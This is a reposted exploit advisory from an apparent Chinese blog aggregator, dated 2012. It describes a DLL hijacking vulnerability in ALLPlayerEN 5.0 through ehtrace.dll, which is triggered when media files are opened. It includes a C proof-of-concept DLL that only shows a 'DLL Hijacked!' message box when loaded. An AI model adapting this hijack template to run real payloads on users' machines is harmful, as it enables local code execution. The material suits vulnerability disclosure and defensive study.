ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability

来源：互联网发布：淘宝找同款原理编辑：程序博客网时间：2024/06/07 02:35

/*Exploit Title: ALLPlayerEN 5.0 ehtrace.dll dll hijack VulnerabilityDate: 2012-3-25Author: instruderSoftware Link: http://www.allplayer.org/zh/download/allplayerVersion: ALLPlayerEN 5.0Tested on: win7CVE : N/ADesc: ALLPlayer Classic suffers from a dll hijacking vulnerabilitythat enables the attacker to execute arbitrary code on a locallevel. The vulnerable extensions are .mp3, .rmvb .avi and so on thruehtrace.dlllibraryVulnerability discovered by instruder have for fun.*/#include <windows.h>BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){switch (fdwReason){case DLL_PROCESS_ATTACH:dll_mll();case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;}int dll_mll(){MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);}

ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability
DLL劫持（HiJack）原理以及实现细节
VGX.DLL Compressed Content Heap Overflow Vulnerability
dll
DLL
dll
DLL
DLL
DLL
Dll
DLL
DLL
DLL
DLL
dll
dll
dll
Dll
Cannot determine whether a queue with the specified format name exists.
测试框架之GTest
学习笔记——XML Schema元素替换
jquery的table隔行变色、复选框的选择变色
SRM537-div1-3-PrinceXDominoes
ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability
奋斗啊，少年！
安新家
多线程程序设计(一)
Java的泛型之简单讲解
通过任务分割提高嵌入式系统的实时性
多线程程序设计(二)
几个关于rand srand time 的编程
由 MS12-005 : 嵌入式对象任意代码执行引发的思考